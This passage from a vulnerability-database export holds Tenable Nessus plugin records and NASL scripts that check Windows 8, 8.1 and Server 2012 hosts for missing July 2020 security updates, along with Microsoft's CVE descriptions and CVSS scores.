LSASS handles specially crafted\n authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1421)\");\n # https://support.microsoft.com/en-us/help/4565535/windows-server-2012-update-kb4565535\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?33ff1388\");\n # https://support.microsoft.com/en-us/help/4565537/windows-server-2012-update-kb4565537\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81575436\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4565535 or Cumulative Update KB4565537.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1435\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n '4565537',\n '4565535'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:[4565537, 4565535])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:16:53", "description": "The remote Windows host is missing security update 4565540 or cumulative update 4565541. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Credential Picker handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1385)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the way that the Credential Enrollment Manager service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1406)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer. An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1399)\n\n - An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1356)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "KB4565540: Windows 8.1 and Windows Server 2012 R2 July 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1085", "CVE-2020-1147", "CVE-2020-1249", "CVE-2020-1267", "CVE-2020-1333", "CVE-2020-1346", "CVE-2020-1351", "CVE-2020-1354", "CVE-2020-1356", "CVE-2020-1359", "CVE-2020-1360", "CVE-2020-1365", "CVE-2020-1368", "CVE-2020-1371", "CVE-2020-1373", "CVE-2020-1374", "CVE-2020-1384", "CVE-2020-1385", "CVE-2020-1389", "CVE-2020-1390", "CVE-2020-1396", "CVE-2020-1397", "CVE-2020-1399", "CVE-2020-1400", "CVE-2020-1401", "CVE-2020-1402", "CVE-2020-1403", "CVE-2020-1406", "CVE-2020-1407", "CVE-2020-1408", "CVE-2020-1409", "CVE-2020-1410", "CVE-2020-1412", "CVE-2020-1419", "CVE-2020-1421", "CVE-2020-1427", "CVE-2020-1428", "CVE-2020-1430", "CVE-2020-1432", "CVE-2020-1435", "CVE-2020-1436", "CVE-2020-1437", "CVE-2020-1438", "CVE-2020-1468"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUL_4565541.NASL", "href": "https://www.tenable.com/plugins/nessus/138463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138463);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-1085\",\n \"CVE-2020-1147\",\n \"CVE-2020-1249\",\n \"CVE-2020-1267\",\n \"CVE-2020-1333\",\n \"CVE-2020-1346\",\n \"CVE-2020-1351\",\n \"CVE-2020-1354\",\n \"CVE-2020-1356\",\n \"CVE-2020-1359\",\n \"CVE-2020-1360\",\n \"CVE-2020-1365\",\n \"CVE-2020-1368\",\n \"CVE-2020-1371\",\n \"CVE-2020-1373\",\n \"CVE-2020-1374\",\n \"CVE-2020-1384\",\n \"CVE-2020-1385\",\n \"CVE-2020-1389\",\n \"CVE-2020-1390\",\n \"CVE-2020-1396\",\n \"CVE-2020-1397\",\n \"CVE-2020-1399\",\n \"CVE-2020-1400\",\n \"CVE-2020-1401\",\n \"CVE-2020-1402\",\n \"CVE-2020-1403\",\n \"CVE-2020-1406\",\n \"CVE-2020-1407\",\n \"CVE-2020-1408\",\n \"CVE-2020-1409\",\n \"CVE-2020-1410\",\n \"CVE-2020-1412\",\n \"CVE-2020-1419\",\n \"CVE-2020-1421\",\n \"CVE-2020-1427\",\n \"CVE-2020-1428\",\n \"CVE-2020-1430\",\n \"CVE-2020-1432\",\n \"CVE-2020-1435\",\n \"CVE-2020-1436\",\n \"CVE-2020-1437\",\n \"CVE-2020-1438\",\n \"CVE-2020-1468\"\n );\n script_xref(name:\"MSKB\", value:\"4565540\");\n script_xref(name:\"MSKB\", value:\"4565541\");\n script_xref(name:\"MSFT\", value:\"MS20-4565540\");\n script_xref(name:\"MSFT\", value:\"MS20-4565541\");\n script_xref(name:\"IAVA\", value:\"2020-A-0306-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0313-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4565540: Windows 8.1 and Windows Server 2012 R2 July 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565540\nor cumulative update 4565541. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that DirectWrite handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit an untrusted webpage. The security update\n addresses the vulnerability by correcting how\n DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Credential Picker handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could allow an application with limited\n privileges on an affected system to execute code at a\n medium integrity level. (CVE-2020-1385)\n\n - An elevation of privilege vulnerability exists when the\n Windows Profile Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted fonts. For all systems except Windows 10, an\n attacker who successfully exploited the vulnerability\n could execute code remotely. For systems running Windows\n 10, an attacker who successfully exploited the\n vulnerability could execute code in an AppContainer\n sandbox context with limited privileges and\n capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. There are multiple ways an\n attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the\n way that the Credential Enrollment Manager service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Location Awareness Service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could allow an application\n with limited privileges on an affected system to execute\n code at a medium integrity level. (CVE-2020-1437)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists when\n Windows Address Book (WAB) improperly processes vcard\n files. (CVE-2020-1410)\n\n - An information disclosure vulnerability exists when the\n Windows Graphics component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An authenticated attacker\n could exploit this vulnerability by running a specially\n crafted application. The update addresses the\n vulnerability by correcting how the Windows Graphics\n Component handles objects in memory. (CVE-2020-1351)\n\n - An elevation of privilege vulnerability exists when\n Group Policy Services Policy Processing improperly\n handle reparse points. An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the\n Windows Modules Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - An information disclosure vulnerability exists when\n Skype for Business is accessed via Internet Explorer. An\n attacker who exploited the vulnerability could cause the\n user to place a call without additional consent, leading\n to information disclosure of the user profile. For the\n vulnerability to be exploited, a user must click a\n specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-1402)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists when the\n Windows Cryptography Next Generation (CNG) Key Isolation\n service improperly handles memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1359,\n CVE-2020-1384)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1373, CVE-2020-1390,\n CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Function Discovery Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1085)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1412)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1389,\n CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows iSCSI Target Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1356)\n\n - This security update corrects a denial of service in the\n Local Security Authority Subsystem Service (LSASS)\n caused when an authenticated attacker sends a specially\n crafted authentication request. A remote attacker who\n successfully exploited this vulnerability could cause a\n denial of service on the target system's LSASS service,\n which triggers an automatic reboot of the system. The\n security update addresses the vulnerability by changing\n the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1435)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1421)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4565540/windows-8-1-kb4565540\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4565541/windows-8-1-kb4565541\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4565540 or Cumulative Update KB4565541.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1435\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n '4565541',\n '4565540'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:[4565541, 4565540])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-25T14:37:03", "description": "The remote Windows host is missing security update 4565513. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1411)\n\n - An elevation of privilege vulnerability exists when the Windows Diagnostics Hub Standard Collector Service fails to properly sanitize input, leading to an unsecure library-loading behavior. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1393)\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An 